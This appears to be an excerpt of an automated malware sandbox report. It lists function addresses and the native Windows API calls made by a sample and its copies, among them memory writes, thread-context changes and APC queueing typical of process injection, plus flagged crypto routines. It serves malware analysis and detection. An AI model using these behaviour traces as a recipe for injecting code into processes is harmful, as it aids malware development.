Source: C:\Users\user\subfolder1\filename1.exeCode function: 10_2_1F40BA30 NtSetContextThread,10_2_1F40BA30
Source: C:\Users\user\subfolder1\filename1.exeCode function: 10_2_1F40A2F0 NtQueryInformationFile,10_2_1F40A2F0
Source: C:\Users\user\subfolder1\filename1.exeCode function: 10_2_1F40A800 NtSetValueKey,10_2_1F40A800
Source: C:\Users\user\subfolder1\filename1.exeCode function: 10_2_1F40B0B0 NtGetContextThread,10_2_1F40B0B0
Source: C:\Users\user\subfolder1\filename1.exeCode function: 10_2_004F01AB EnumWindows,NtSetInformationThread,10_2_004F01AB
Source: C:\Users\user\subfolder1\filename1.exeCode function: 10_2_004F5A06 NtProtectVirtualMemory,10_2_004F5A06
Source: C:\Users\user\subfolder1\filename1.exeCode function: 10_2_004F5DAD NtSetInformationThread,10_2_004F5DAD
Source: C:\Users\user\subfolder1\filename1.exeCode function: 10_2_004F603D NtSetInformationThread,10_2_004F603D
Source: C:\Users\user\subfolder1\filename1.exeCode function: 10_2_004F60F0 NtSetInformationThread,10_2_004F60F0
Source: C:\Users\user\subfolder1\filename1.exeCode function: 10_2_004F6265 NtSetInformationThread,10_2_004F6265
Source: C:\Users\user\subfolder1\filename1.exeCode function: 10_2_004F02BC NtSetInformationThread,10_2_004F02BC
Source: C:\Users\user\subfolder1\filename1.exeCode function: 10_2_004F6376 NtSetInformationThread,10_2_004F6376
Source: C:\Users\user\subfolder1\filename1.exeCode function: 10_2_004F5DB6 NtSetInformationThread,10_2_004F5DB6
Source: C:\Users\user\subfolder1\filename1.exeCode function: 10_2_004F5E4B NtSetInformationThread,10_2_004F5E4B
Source: C:\Users\user\subfolder1\filename1.exeCode function: 10_2_004F5EF5 NtSetInformationThread,10_2_004F5EF5
Source: C:\Users\user\subfolder1\filename1.exeCode function: 10_2_004F5F8E NtSetInformationThread,10_2_004F5F8E
Source: C:\Users\user\subfolder1\filename1.exeCode function: 12_2_1F54A750 NtCreateFile,LdrInitializeThunk,12_2_1F54A750
Source: C:\Users\user\subfolder1\filename1.exeCode function: 12_2_1F54A700 NtProtectVirtualMemory,LdrInitializeThunk,12_2_1F54A700
Source: C:\Users\user\subfolder1\filename1.exeCode function: 12_2_1F54A720 NtResumeThread,LdrInitializeThunk,12_2_1F54A720
Source: C:\Users\user\subfolder1\filename1.exeCode function: 12_2_1F54A610 NtAdjustPrivilegesToken,LdrInitializeThunk,12_2_1F54A610
Source: C:\Users\user\subfolder1\filename1.exeCode function: 12_2_1F54A6A0 NtCreateSection,LdrInitializeThunk,12_2_1F54A6A0
Source: C:\Users\user\subfolder1\filename1.exeCode function: 12_2_1F54A540 NtDelayExecution,LdrInitializeThunk,12_2_1F54A540
Source: C:\Users\user\subfolder1\filename1.exeCode function: 12_2_1F54A560 NtQuerySystemInformation,LdrInitializeThunk,12_2_1F54A560
Source: C:\Users\user\subfolder1\filename1.exeCode function: 12_2_1F54A5F0 NtReadVirtualMemory,LdrInitializeThunk,12_2_1F54A5F0
Source: C:\Users\user\subfolder1\filename1.exeCode function: 12_2_1F54A410 NtQueryInformationToken,LdrInitializeThunk,12_2_1F54A410
Source: C:\Users\user\subfolder1\filename1.exeCode function: 12_2_1F54A480 NtMapViewOfSection,LdrInitializeThunk,12_2_1F54A480
Source: C:\Users\user\subfolder1\filename1.exeCode function: 12_2_1F54A4A0 NtUnmapViewOfSection,LdrInitializeThunk,12_2_1F54A4A0
Source: C:\Users\user\subfolder1\filename1.exeCode function: 12_2_1F54A360 NtAllocateVirtualMemory,LdrInitializeThunk,12_2_1F54A360
Source: C:\Users\user\subfolder1\filename1.exeCode function: 12_2_1F54A3E0 NtFreeVirtualMemory,LdrInitializeThunk,12_2_1F54A3E0
Source: C:\Users\user\subfolder1\filename1.exeCode function: 12_2_1F54A240 NtReadFile,LdrInitializeThunk,12_2_1F54A240
Source: C:\Users\user\subfolder1\filename1.exeCode function: 12_2_1F54A2D0 NtClose,LdrInitializeThunk,12_2_1F54A2D0
Source: C:\Users\user\subfolder1\filename1.exeCode function: 12_2_1F54BD40 NtSuspendThread,12_2_1F54BD40
Source: C:\Users\user\subfolder1\filename1.exeCode function: 12_2_1F54ACE0 NtCreateMutant,12_2_1F54ACE0
Source: C:\Users\user\subfolder1\filename1.exeCode function: 12_2_1F54BA30 NtSetContextThread,12_2_1F54BA30
Source: C:\Users\user\subfolder1\filename1.exeCode function: 12_2_1F54A800 NtSetValueKey,12_2_1F54A800
Source: C:\Users\user\subfolder1\filename1.exeCode function: 12_2_1F54A710 NtQuerySection,12_2_1F54A710
Source: C:\Users\user\subfolder1\filename1.exeCode function: 12_2_1F54A780 NtOpenDirectoryObject,12_2_1F54A780
Source: C:\Users\user\subfolder1\filename1.exeCode function: 12_2_1F54A650 NtQueueApcThread,12_2_1F54A650
Source: C:\Users\user\subfolder1\filename1.exeCode function: 12_2_1F54A6D0 NtCreateProcessEx,12_2_1F54A6D0
Source: C:\Users\user\subfolder1\filename1.exeCode function: 12_2_1F54A520 NtEnumerateKey,12_2_1F54A520
Source: C:\Users\user\subfolder1\filename1.exeCode function: 12_2_1F54A5A0 NtWriteVirtualMemory,12_2_1F54A5A0
Source: C:\Users\user\subfolder1\filename1.exeCode function: 12_2_1F54A470 NtSetInformationFile,12_2_1F54A470
Source: C:\Users\user\subfolder1\filename1.exeCode function: 12_2_1F54B470 NtOpenThread,12_2_1F54B470
Source: C:\Users\user\subfolder1\filename1.exeCode function: 12_2_1F54A460 NtOpenProcess,12_2_1F54A460
Source: C:\Users\user\subfolder1\filename1.exeCode function: 12_2_1F54B410 NtOpenProcessToken,12_2_1F54B410
Source: C:\Users\user\subfolder1\filename1.exeCode function: 12_2_1F54A430 NtQueryVirtualMemory,12_2_1F54A430
Source: C:\Users\user\subfolder1\filename1.exeCode function: 12_2_1F54A350 NtQueryValueKey,12_2_1F54A350
Source: C:\Users\user\subfolder1\filename1.exeCode function: 12_2_1F54A370 NtQueryInformationProcess,12_2_1F54A370
Source: C:\Users\user\subfolder1\filename1.exeCode function: 12_2_1F54A310 NtEnumerateValueKey,12_2_1F54A310
Source: C:\Users\user\subfolder1\filename1.exeCode function: 12_2_1F54A3D0 NtCreateKey,12_2_1F54A3D0
Source: C:\Users\user\subfolder1\filename1.exeCode function: 12_2_1F54A260 NtWriteFile,12_2_1F54A260
Source: C:\Users\user\subfolder1\filename1.exeCode function: 12_2_1F54A220 NtWaitForSingleObject,12_2_1F54A220
Source: C:\Users\user\subfolder1\filename1.exeCode function: 12_2_1F54A2F0 NtQueryInformationFile,12_2_1F54A2F0
Source: C:\Users\user\subfolder1\filename1.exeCode function: 12_2_1F54B0B0 NtGetContextThread,12_2_1F54B0B0
Source: C:\Users\user\subfolder1\filename1.exeCode function: 12_2_004F01AB EnumWindows,NtSetInformationThread,12_2_004F01AB
Source: C:\Users\user\subfolder1\filename1.exeCode function: 12_2_004F5A06 NtProtectVirtualMemory,12_2_004F5A06
Source: C:\Users\user\subfolder1\filename1.exeCode function: 12_2_004F5DAD NtSetInformationThread,12_2_004F5DAD
Source: C:\Users\user\subfolder1\filename1.exeCode function: 12_2_004F603D NtSetInformationThread,12_2_004F603D
Source: C:\Users\user\subfolder1\filename1.exeCode function: 12_2_004F60F0 NtSetInformationThread,12_2_004F60F0
Source: C:\Users\user\subfolder1\filename1.exeCode function: 12_2_004F6265 NtSetInformationThread,12_2_004F6265
Source: C:\Users\user\subfolder1\filename1.exeCode function: 12_2_004F02BC NtSetInformationThread,12_2_004F02BC
Source: C:\Users\user\subfolder1\filename1.exeCode function: 12_2_004F6376 NtSetInformationThread,12_2_004F6376
Source: C:\Users\user\subfolder1\filename1.exeCode function: 12_2_004F5DB6 NtSetInformationThread,12_2_004F5DB6
Source: C:\Users\user\subfolder1\filename1.exeCode function: 12_2_004F5E4B NtSetInformationThread,12_2_004F5E4B
Source: C:\Users\user\subfolder1\filename1.exeCode function: 12_2_004F5EF5 NtSetInformationThread,12_2_004F5EF5
Source: C:\Users\user\subfolder1\filename1.exeCode function: 12_2_004F5F8E NtSetInformationThread,12_2_004F5F8E
Source: C:\Program Files (x86)\T7nhhu\gdi4hxdb6.exeCode function: 23_2_021B5A06 NtProtectVirtualMemory,23_2_021B5A06
Source: C:\Program Files (x86)\T7nhhu\gdi4hxdb6.exeCode function: 23_2_021B1F11 NtWriteVirtualMemory,23_2_021B1F11
Source: C:\Program Files (x86)\T7nhhu\gdi4hxdb6.exeCode function: 23_2_021B01AB EnumWindows,NtSetInformationThread,TerminateProcess,23_2_021B01AB
Source: C:\Program Files (x86)\T7nhhu\gdi4hxdb6.exeCode function: 23_2_021B5DAD NtResumeThread,23_2_021B5DAD
Source: C:\Program Files (x86)\T7nhhu\gdi4hxdb6.exeCode function: 23_2_021B2206 NtWriteVirtualMemory,23_2_021B2206
Source: C:\Program Files (x86)\T7nhhu\gdi4hxdb6.exeCode function: 23_2_021B603D NtResumeThread,23_2_021B603D
Source: C:\Program Files (x86)\T7nhhu\gdi4hxdb6.exeCode function: 23_2_021B5E4B NtResumeThread,23_2_021B5E4B
Source: C:\Program Files (x86)\T7nhhu\gdi4hxdb6.exeCode function: 23_2_021B6265 NtResumeThread,23_2_021B6265
Source: C:\Program Files (x86)\T7nhhu\gdi4hxdb6.exeCode function: 23_2_021B02BC NtSetInformationThread,TerminateProcess,23_2_021B02BC
Source: C:\Program Files (x86)\T7nhhu\gdi4hxdb6.exeCode function: 23_2_021B20B3 NtWriteVirtualMemory,23_2_021B20B3
Source: C:\Program Files (x86)\T7nhhu\gdi4hxdb6.exeCode function: 23_2_021B60F0 NtResumeThread,23_2_021B60F0
Source: C:\Program Files (x86)\T7nhhu\gdi4hxdb6.exeCode function: 23_2_021B5EF5 NtResumeThread,23_2_021B5EF5
Source: C:\Program Files (x86)\T7nhhu\gdi4hxdb6.exeCode function: 23_2_021B6376 NtResumeThread,23_2_021B6376
Source: C:\Program Files (x86)\T7nhhu\gdi4hxdb6.exeCode function: 23_2_021B2360 NtWriteVirtualMemory,23_2_021B2360
Source: C:\Program Files (x86)\T7nhhu\gdi4hxdb6.exeCode function: 23_2_021B5F8E NtResumeThread,23_2_021B5F8E
Source: C:\Program Files (x86)\T7nhhu\gdi4hxdb6.exeCode function: 23_2_021B5DB6 NtResumeThread,23_2_021B5DB6
Source: C:\Program Files (x86)\T7nhhu\gdi4hxdb6.exeCode function: 23_2_021B1FA9 NtWriteVirtualMemory,23_2_021B1FA9
Source: C:\Program Files (x86)\T7nhhu\gdi4hxdb6.exeCode function: 24_2_004F5A06 NtProtectVirtualMemory,24_2_004F5A06
Source: C:\Program Files (x86)\T7nhhu\gdi4hxdb6.exeCode function: 24_2_004F01AB EnumWindows,NtSetInformationThread,TerminateProcess,24_2_004F01AB
Source: C:\Program Files (x86)\T7nhhu\gdi4hxdb6.exeCode function: 24_2_004F02BC NtSetInformationThread,TerminateProcess,24_2_004F02BC
Source: C:\Users\user\subfolder1\filename1.exeCode function: 25_2_020F5A06 NtProtectVirtualMemory,25_2_020F5A06
Source: C:\Users\user\subfolder1\filename1.exeCode function: 25_2_020F1F11 NtWriteVirtualMemory,25_2_020F1F11
Source: C:\Users\user\subfolder1\filename1.exeCode function: 25_2_020F5DAD NtSetContextThread,25_2_020F5DAD
Source: C:\Users\user\subfolder1\filename1.exeCode function: 25_2_020F01AB EnumWindows,NtSetInformationThread,TerminateProcess,25_2_020F01AB
Source: C:\Users\user\subfolder1\filename1.exeCode function: 25_2_020F2206 NtWriteVirtualMemory,25_2_020F2206
Source: C:\Users\user\subfolder1\filename1.exeCode function: 25_2_020F603D NtSetContextThread,25_2_020F603D
Source: C:\Users\user\subfolder1\filename1.exeCode function: 25_2_020F5E4B NtSetContextThread,25_2_020F5E4B
Source: C:\Users\user\subfolder1\filename1.exeCode function: 25_2_020F6265 NtSetContextThread,25_2_020F6265
Source: C:\Users\user\subfolder1\filename1.exeCode function: 25_2_020F02BC NtSetInformationThread,TerminateProcess,25_2_020F02BC
Source: C:\Users\user\subfolder1\filename1.exeCode function: 25_2_020F20B3 NtWriteVirtualMemory,25_2_020F20B3
Source: C:\Users\user\subfolder1\filename1.exeCode function: 25_2_020F5EF5 NtSetContextThread,25_2_020F5EF5
Source: C:\Users\user\subfolder1\filename1.exeCode function: 25_2_020F60F0 NtSetContextThread,25_2_020F60F0
Source: C:\Users\user\subfolder1\filename1.exeCode function: 25_2_020F2360 NtWriteVirtualMemory,25_2_020F2360
Source: C:\Users\user\subfolder1\filename1.exeCode function: 25_2_020F6376 NtSetContextThread,25_2_020F6376
Source: C:\Users\user\subfolder1\filename1.exeCode function: 25_2_020F5F8E NtSetContextThread,25_2_020F5F8E
Source: C:\Users\user\subfolder1\filename1.exeCode function: 25_2_020F1FA9 NtWriteVirtualMemory,25_2_020F1FA9
Source: C:\Users\user\subfolder1\filename1.exeCode function: 25_2_020F5DB6 NtSetContextThread,25_2_020F5DB6
Source: C:\Users\user\subfolder1\filename1.exeCode function: 26_2_1F55A750 NtCreateFile,LdrInitializeThunk,26_2_1F55A750
Source: C:\Users\user\subfolder1\filename1.exeCode function: 26_2_1F55A700 NtProtectVirtualMemory,LdrInitializeThunk,26_2_1F55A700
Source: C:\Users\user\subfolder1\filename1.exeCode function: 26_2_1F55A720 NtResumeThread,LdrInitializeThunk,26_2_1F55A720
Source: C:\Users\user\subfolder1\filename1.exeCode function: 26_2_1F55A610 NtAdjustPrivilegesToken,LdrInitializeThunk,26_2_1F55A610
Source: C:\Users\user\subfolder1\filename1.exeCode function: 26_2_1F55A6A0 NtCreateSection,LdrInitializeThunk,26_2_1F55A6A0
Source: C:\Users\user\subfolder1\filename1.exeCode function: 26_2_1F55A540 NtDelayExecution,LdrInitializeThunk,26_2_1F55A540
Source: C:\Users\user\subfolder1\filename1.exeCode function: 26_2_1F55A560 NtQuerySystemInformation,LdrInitializeThunk,26_2_1F55A560
Source: C:\Users\user\subfolder1\filename1.exeCode function: 26_2_1F55A5F0 NtReadVirtualMemory,LdrInitializeThunk,26_2_1F55A5F0
Source: C:\Users\user\subfolder1\filename1.exeCode function: 26_2_1F55A410 NtQueryInformationToken,LdrInitializeThunk,26_2_1F55A410
Source: C:\Users\user\subfolder1\filename1.exeCode function: 26_2_1F55A480 NtMapViewOfSection,LdrInitializeThunk,26_2_1F55A480
Source: C:\Users\user\subfolder1\filename1.exeCode function: 26_2_1F55A4A0 NtUnmapViewOfSection,LdrInitializeThunk,26_2_1F55A4A0
Source: C:\Users\user\subfolder1\filename1.exeCode function: 26_2_1F55A360 NtAllocateVirtualMemory,LdrInitializeThunk,26_2_1F55A360
Source: C:\Users\user\subfolder1\filename1.exeCode function: 26_2_1F55A3E0 NtFreeVirtualMemory,LdrInitializeThunk,26_2_1F55A3E0
Source: C:\Users\user\subfolder1\filename1.exeCode function: 26_2_1F55A240 NtReadFile,LdrInitializeThunk,26_2_1F55A240
Source: C:\Users\user\subfolder1\filename1.exeCode function: 26_2_1F55A2D0 NtClose,LdrInitializeThunk,26_2_1F55A2D0
Source: C:\Users\user\subfolder1\filename1.exeCode function: 26_2_1F55BD40 NtSuspendThread,26_2_1F55BD40
Source: C:\Users\user\subfolder1\filename1.exeCode function: 26_2_1F55BA30 NtSetContextThread,26_2_1F55BA30
Source: C:\Users\user\subfolder1\filename1.exeCode function: 26_2_1F55B470 NtOpenThread,26_2_1F55B470
Source: C:\Users\user\subfolder1\filename1.exeCode function: 26_2_1F55B410 NtOpenProcessToken,26_2_1F55B410
Source: C:\Users\user\subfolder1\filename1.exeCode function: 26_2_1F55B0B0 NtGetContextThread,26_2_1F55B0B0
Source: C:\Users\user\subfolder1\filename1.exeCode function: 26_2_1F55ACE0 NtCreateMutant,26_2_1F55ACE0
Source: C:\Users\user\subfolder1\filename1.exeCode function: 26_2_1F55A800 NtSetValueKey,26_2_1F55A800
Source: C:\Users\user\subfolder1\filename1.exeCode function: 26_2_1F55A710 NtQuerySection,26_2_1F55A710
Source: C:\Users\user\subfolder1\filename1.exeCode function: 26_2_1F55A780 NtOpenDirectoryObject,26_2_1F55A780
Source: C:\Users\user\subfolder1\filename1.exeCode function: 26_2_1F55A650 NtQueueApcThread,26_2_1F55A650
Source: C:\Users\user\subfolder1\filename1.exeCode function: 26_2_1F55A6D0 NtCreateProcessEx,26_2_1F55A6D0
Source: C:\Users\user\subfolder1\filename1.exeCode function: 26_2_1F55A520 NtEnumerateKey,26_2_1F55A520
Source: C:\Users\user\subfolder1\filename1.exeCode function: 26_2_1F55A5A0 NtWriteVirtualMemory,26_2_1F55A5A0
Source: C:\Users\user\subfolder1\filename1.exeCode function: 26_2_1F55A470 NtSetInformationFile,26_2_1F55A470
Source: C:\Users\user\subfolder1\filename1.exeCode function: 26_2_1F55A460 NtOpenProcess,26_2_1F55A460
Source: C:\Users\user\subfolder1\filename1.exeCode function: 26_2_1F55A430 NtQueryVirtualMemory,26_2_1F55A430
Source: C:\Users\user\subfolder1\filename1.exeCode function: 26_2_1F55A350 NtQueryValueKey,26_2_1F55A350
Source: C:\Users\user\subfolder1\filename1.exeCode function: 26_2_1F55A370 NtQueryInformationProcess,26_2_1F55A370
Source: C:\Users\user\subfolder1\filename1.exeCode function: 26_2_1F55A310 NtEnumerateValueKey,26_2_1F55A310
Source: C:\Users\user\subfolder1\filename1.exeCode function: 26_2_1F55A3D0 NtCreateKey,26_2_1F55A3D0
Source: C:\Users\user\subfolder1\filename1.exeCode function: 26_2_1F55A260 NtWriteFile,26_2_1F55A260
Source: C:\Users\user\subfolder1\filename1.exeCode function: 26_2_1F55A220 NtWaitForSingleObject,26_2_1F55A220
Source: C:\Users\user\subfolder1\filename1.exeCode function: 26_2_1F55A2F0 NtQueryInformationFile,26_2_1F55A2F0
Source: C:\Users\user\subfolder1\filename1.exeCode function: 26_2_004F01AB NtSetInformationThread,26_2_004F01AB
Source: C:\Users\user\subfolder1\filename1.exeCode function: 26_2_004F5A06 NtProtectVirtualMemory,26_2_004F5A06
Source: C:\Users\user\subfolder1\filename1.exeCode function: 26_2_004F5DAD NtSetInformationThread,26_2_004F5DAD
Source: C:\Users\user\subfolder1\filename1.exeCode function: 26_2_004F603D NtSetInformationThread,26_2_004F603D
Source: C:\Users\user\subfolder1\filename1.exeCode function: 26_2_004F60F0 NtSetInformationThread,26_2_004F60F0
Source: C:\Users\user\subfolder1\filename1.exeCode function: 26_2_004F6265 NtSetInformationThread,26_2_004F6265
Source: C:\Users\user\subfolder1\filename1.exeCode function: 26_2_004F02BC NtSetInformationThread,26_2_004F02BC
Source: C:\Users\user\subfolder1\filename1.exeCode function: 26_2_004F6376 NtSetInformationThread,26_2_004F6376
Source: C:\Users\user\subfolder1\filename1.exeCode function: 26_2_004F5DB6 NtSetInformationThread,26_2_004F5DB6
Source: C:\Users\user\subfolder1\filename1.exeCode function: 26_2_004F5E4B NtSetInformationThread,26_2_004F5E4B
Source: C:\Users\user\subfolder1\filename1.exeCode function: 26_2_004F5EF5 NtSetInformationThread,26_2_004F5EF5
Source: C:\Users\user\subfolder1\filename1.exeCode function: 26_2_004F5F8E NtSetInformationThread,26_2_004F5F8E
Detected potential crypto functionShow sources
Source: C:\Users\user\Desktop\#Uacac#Uc801 #Ud488#Ubaa9 #Ub9ac#Uc2a4#Ud2b8.exeCode function: 1_2_004F2BF21_2_004F2BF2
Source: C:\Users\user\subfolder1\filename1.exeCode function: 2_2_022E2BF22_2_022E2BF2
Source: C:\Users\user\subfolder1\filename1.exeCode function: 5_2_1F4A17465_2_1F4A1746
Source: C:\Users\user\subfolder1\filename1.exeCode function: 5_2_1F4A1FCE5_2_1F4A1FCE
Source: C:\Users\user\subfolder1\filename1.exeCode function: 5_2_1F3F57905_2_1F3F5790
Source: C:\Users\user\subfolder1\filename1.exeCode function: 5_2_1F4927825_2_1F492782
Source: C:\Users\user\subfolder1\filename1.exeCode function: 5_2_1F3D67D05_2_1F3D67D0
Source: C:\Users\user\subfolder1\filename1.exeCode function: 5_2_1F404E615_2_1F404E61
Source: C:\Users\user\subfolder1\filename1.exeCode function: 5_2_1F49CE665_2_1F49CE66
Source: C:\Users\user\subfolder1\filename1.exeCode function: 5_2_1F405E705_2_1F405E70
Source: C:\Users\user\subfolder1\filename1.exeCode function: 5_2_1F4066115_2_1F406611
Source: C:\Users\user\subfolder1\filename1.exeCode function: 5_2_1F3F76405_2_1F3F7640
Source: C:\Users\user\subfolder1\filename1.exeCode function: 5_2_1F4A26F85_2_1F4A26F8
Source: C:\Users\user\subfolder1\filename1.exeCode function: 5_2_1F493E965_2_1F493E96
Source: C:\Users\user\subfolder1\filename1.exeCode function: 5_2_1F3F15305_2_1F3F1530
Source: C:\Users\user\subfolder1\filename1.exeCode function: 5_2_1F491D1B5_2_1F491D1B
Source: C:\Users\user\subfolder1\filename1.exeCode function: 5_2_1F4A25195_2_1F4A2519
Source: C:\Users\user\subfolder1\filename1.exeCode function: 5_2_1F47C53F5_2_1F47C53F
Source: C:\Users\user\subfolder1\filename1.exeCode function: 5_2_1F3D0D405_2_1F3D0D40
Source: C:\Users\user\subfolder1\filename1.exeCode function: 5_2_1F48FDDB5_2_1F48FDDB
Source: C:\Users\user\subfolder1\filename1.exeCode function: 5_2_1F49D5D25_2_1F49D5D2
Source: C:\Users\user\subfolder1\filename1.exeCode function: 5_2_1F481DE35_2_1F481DE3
Source: C:\Users\user\subfolder1\filename1.exeCode function: 5_2_1F49E5815_2_1F49E581
Source: C:\Users\user\subfolder1\filename1.exeCode function: 5_2_1F47E58A5_2_1F47E58A
Source: C:\Users\user\subfolder1\filename1.exeCode function: 5_2_1F3F14105_2_1F3F1410
Source: C:\Users\user\subfolder1\filename1.exeCode function: 5_2_1F3E740C5_2_1F3E740C
Source: C:\Users\user\subfolder1\filename1.exeCode function: 5_2_1F40547E5_2_1F40547E
Source: C:\Users\user\subfolder1\filename1.exeCode function: 5_2_1F48F42B5_2_1F48F42B
Source: C:\Users\user\subfolder1\filename1.exeCode function: 5_2_1F49DCC55_2_1F49DCC5
Source: C:\Users\user\subfolder1\filename1.exeCode function: 5_2_1F4944EF5_2_1F4944EF
Source: C:\Users\user\subfolder1\filename1.exeCode function: 5_2_1F4A2C9A5_2_1F4A2C9A
Source: C:\Users\user\subfolder1\filename1.exeCode function: 5_2_1F4A1C9F5_2_1F4A1C9F
Source: C:\Users\user\subfolder1\filename1.exeCode function: 5_2_1F4934905_2_1F493490
Source: C:\Users\user\subfolder1\filename1.exeCode function: 5_2_1F3FFB405_2_1F3FFB40
Source: C:\Users\user\subfolder1\filename1.exeCode function: 5_2_1F4063C25_2_1F4063C2
Source: C:\Users\user\subfolder1\filename1.exeCode function: 5_2_1F404B965_2_1F404B96
Source: C:\Users\user\subfolder1\filename1.exeCode function: 5_2_1F3DEBE05_2_1F3DEBE0
Source: C:\Users\user\subfolder1\filename1.exeCode function: 5_2_1F404A5B5_2_1F404A5B
Source: C:\Users\user\subfolder1\filename1.exeCode function: 5_2_1F490A025_2_1F490A02
Source: C:\Users\user\subfolder1\filename1.exeCode function: 5_2_1F4AE2145_2_1F4AE214
Source: C:\Users\user\subfolder1\filename1.exeCode function: 5_2_1F40523D5_2_1F40523D
Source: C:\Users\user\subfolder1\filename1.exeCode function: 5_2_1F3F42B05_2_1F3F42B0
Source: C:\Users\user\subfolder1\filename1.exeCode function: 5_2_1F4A22DD5_2_1F4A22DD
Source: C:\Users\user\subfolder1\filename1.exeCode function: 5_2_1F4A1A995_2_1F4A1A99
Source: C:\Users\user\subfolder1\filename1.exeCode function: 5_2_1F40594B5_2_1F40594B
Source: C:\Users\user\subfolder1\filename1.exeCode function: 5_2_1F4299065_2_1F429906
Source: C:\Users\user\subfolder1\filename1.exeCode function: 5_2_1F4071105_2_1F407110
Source: C:\Users\user\subfolder1\filename1.exeCode function: 5_2_1F4961DF5_2_1F4961DF
Source: C:\Users\user\subfolder1\filename1.exeCode function: 5_2_1F4A19E25_2_1F4A19E2
Source: C:\Users\user\subfolder1\filename1.exeCode function: 5_2_1F4061805_2_1F406180
Source: C:\Users\user\subfolder1\filename1.exeCode function: 5_2_1F4AD9BE5_2_1F4AD9BE
Source: C:\Users\user\subfolder1\filename1.exeCode function: 5_2_1F4010705_2_1F401070
Source: C:\Users\user\subfolder1\filename1.exeCode function: 5_2_1F4098105_2_1F409810
Source: C:\Users\user\subfolder1\filename1.exeCode function: 5_2_1F49D0165_2_1F49D016
Source: C:\Users\user\subfolder1\filename1.exeCode function: 5_2_1F40E0205_2_1F40E020
Source: C:\Users\user\subfolder1\filename1.exeCode function: 5_2_1F4000215_2_1F400021
Source: C:\Users\user\subfolder1\filename1.exeCode function: 5_2_1F4048CB5_2_1F4048CB
Source: C:\Users\user\subfolder1\filename1.exeCode function: 5_2_1F4A28E85_2_1F4A28E8
Source: C:\Users\user\subfolder1\filename1.exeCode function: 5_2_1F3EA0805_2_1F3EA080
Source: C:\Users\user\subfolder1\filename1.exeCode function: 5_2_1F4818B65_2_1F4818B6
Source: C:\Users\user\subfolder1\filename1.exeCode function: 5_2_004F2BF25_2_004F2BF2
Source: C:\Users\user\subfolder1\filename1.exeCode function: 8_2_020A2BF28_2_020A2BF2
Source: C:\Users\user\subfolder1\filename1.exeCode function: 10_2_1F49174610_2_1F491746
Source: C:\Users\user\subfolder1\filename1.exeCode function: 10_2_1F491FCE10_2_1F491FCE
Source: C:\Users\user\subfolder1\filename1.exeCode function: 10_2_1F3E579010_2_1F3E5790
Source: C:\Users\user\subfolder1\filename1.exeCode function: 10_2_1F48278210_2_1F482782
Source: C:\Users\user\subfolder1\filename1.exeCode function: 10_2_1F3C67D010_2_1F3C67D0
Source: C:\Users\user\subfolder1\filename1.exeCode function: 10_2_1F48CE6610_2_1F48CE66
Source: C:\Users\user\subfolder1\filename1.exeCode function: 10_2_1F3F661110_2_1F3F6611
Source: C:\Users\user\subfolder1\filename1.exeCode function: 10_2_1F3F5E7010_2_1F3F5E70
Source: C:\Users\user\subfolder1\filename1.exeCode function: 10_2_1F3F4E6110_2_1F3F4E61
Source: C:\Users\user\subfolder1\filename1.exeCode function: 10_2_1F3E764010_2_1F3E7640
Source: C:\Users\user\subfolder1\filename1.exeCode function: 10_2_1F4926F810_2_1F4926F8
Source: C:\Users\user\subfolder1\filename1.exeCode function: 10_2_1F483E9610_2_1F483E96
Source: C:\Users\user\subfolder1\filename1.exeCode function: 10_2_1F3E153010_2_1F3E1530
Source: C:\Users\user\subfolder1\filename1.exeCode function: 10_2_1F49251910_2_1F492519
Source: C:\Users\user\subfolder1\filename1.exeCode function: 10_2_1F481D1B10_2_1F481D1B
Source: C:\Users\user\subfolder1\filename1.exeCode function: 10_2_1F46C53F10_2_1F46C53F
Source: C:\Users\user\subfolder1\filename1.exeCode function: 10_2_1F3C0D4010_2_1F3C0D40
Source: C:\Users\user\subfolder1\filename1.exeCode function: 10_2_1F48D5D210_2_1F48D5D2
Source: C:\Users\user\subfolder1\filename1.exeCode function: 10_2_1F47FDDB10_2_1F47FDDB
Source: C:\Users\user\subfolder1\filename1.exeCode function: 10_2_1F471DE310_2_1F471DE3
Source: C:\Users\user\subfolder1\filename1.exeCode function: 10_2_1F48E58110_2_1F48E581
Source: C:\Users\user\subfolder1\filename1.exeCode function: 10_2_1F46E58A10_2_1F46E58A
Source: C:\Users\user\subfolder1\filename1.exeCode function: 10_2_1F3E141010_2_1F3E1410
Source: C:\Users\user\subfolder1\filename1.exeCode function: 10_2_1F3D740C10_2_1F3D740C
Source: C:\Users\user\subfolder1\filename1.exeCode function: 10_2_1F3F547E10_2_1F3F547E
Source: C:\Users\user\subfolder1\filename1.exeCode function: 10_2_1F47F42B10_2_1F47F42B
Source: C:\Users\user\subfolder1\filename1.exeCode function: 10_2_1F48DCC510_2_1F48DCC5
Source: C:\Users\user\subfolder1\filename1.exeCode function: 10_2_1F4844EF10_2_1F4844EF
Source: C:\Users\user\subfolder1\filename1.exeCode function: 10_2_1F492C9A10_2_1F492C9A
Source: C:\Users\user\subfolder1\filename1.exeCode function: 10_2_1F491C9F10_2_1F491C9F
Source: C:\Users\user\subfolder1\filename1.exeCode function: 10_2_1F48349010_2_1F483490
Source: C:\Users\user\subfolder1\filename1.exeCode function: 10_2_1F3EFB4010_2_1F3EFB40
Source: C:\Users\user\subfolder1\filename1.exeCode function: 10_2_1F3F4B9610_2_1F3F4B96
Source: C:\Users\user\subfolder1\filename1.exeCode function: 10_2_1F3CEBE010_2_1F3CEBE0
Source: C:\Users\user\subfolder1\filename1.exeCode function: 10_2_1F3F63C210_2_1F3F63C2
Source: C:\Users\user\subfolder1\filename1.exeCode function: 10_2_1F3F523D10_2_1F3F523D
Source: C:\Users\user\subfolder1\filename1.exeCode function: 10_2_1F480A0210_2_1F480A02
Source: C:\Users\user\subfolder1\filename1.exeCode function: 10_2_1F49E21410_2_1F49E214
Source: C:\Users\user\subfolder1\filename1.exeCode function: 10_2_1F3F4A5B10_2_1F3F4A5B
Source: C:\Users\user\subfolder1\filename1.exeCode function: 10_2_1F3E42B010_2_1F3E42B0
Source: C:\Users\user\subfolder1\filename1.exeCode function: 10_2_1F4922DD10_2_1F4922DD
Source: C:\Users\user\subfolder1\filename1.exeCode function: 10_2_1F491A9910_2_1F491A99
Source: C:\Users\user\subfolder1\filename1.exeCode function: 10_2_1F3E911010_2_1F3E9110
Source: C:\Users\user\subfolder1\filename1.exeCode function: 10_2_1F3F711010_2_1F3F7110
Source: C:\Users\user\subfolder1\filename1.exeCode function: 10_2_1F41990610_2_1F419906
Source: C:\Users\user\subfolder1\filename1.exeCode function: 10_2_1F3F594B10_2_1F3F594B
Source: C:\Users\user\subfolder1\filename1.exeCode function: 10_2_1F4861DF10_2_1F4861DF
